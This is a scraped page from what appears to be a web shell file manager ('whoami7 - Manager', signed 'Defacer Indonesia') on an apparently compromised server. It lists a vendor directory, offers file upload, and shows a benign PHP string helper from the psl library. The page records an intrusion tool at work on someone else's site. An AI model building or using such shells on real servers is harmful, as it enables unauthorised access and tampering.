whoami7 - Manager
:
/
home
/
kckglobal
/
www
/
portal
/
vendor
/
azjezz
/
psl
/
src
/
Psl
/
Str
/
Byte
/
Upload File:
files >> /home/kckglobal/www/portal/vendor/azjezz/psl/src/Psl/Str/Byte/strip_prefix.php
<?php declare(strict_types=1); namespace Psl\Str\Byte; /** * Returns the string with the given prefix removed, or the string itself if * it doesn't start with the prefix. * * @pure */ function strip_prefix(string $string, string $prefix): string { if ('' === $prefix || !starts_with($string, $prefix)) { return $string; } /** @psalm-suppress MissingThrowsDocblock - $offset is within-bounds. */ return slice($string, length($prefix)); }
Copyright ©2021 || Defacer Indonesia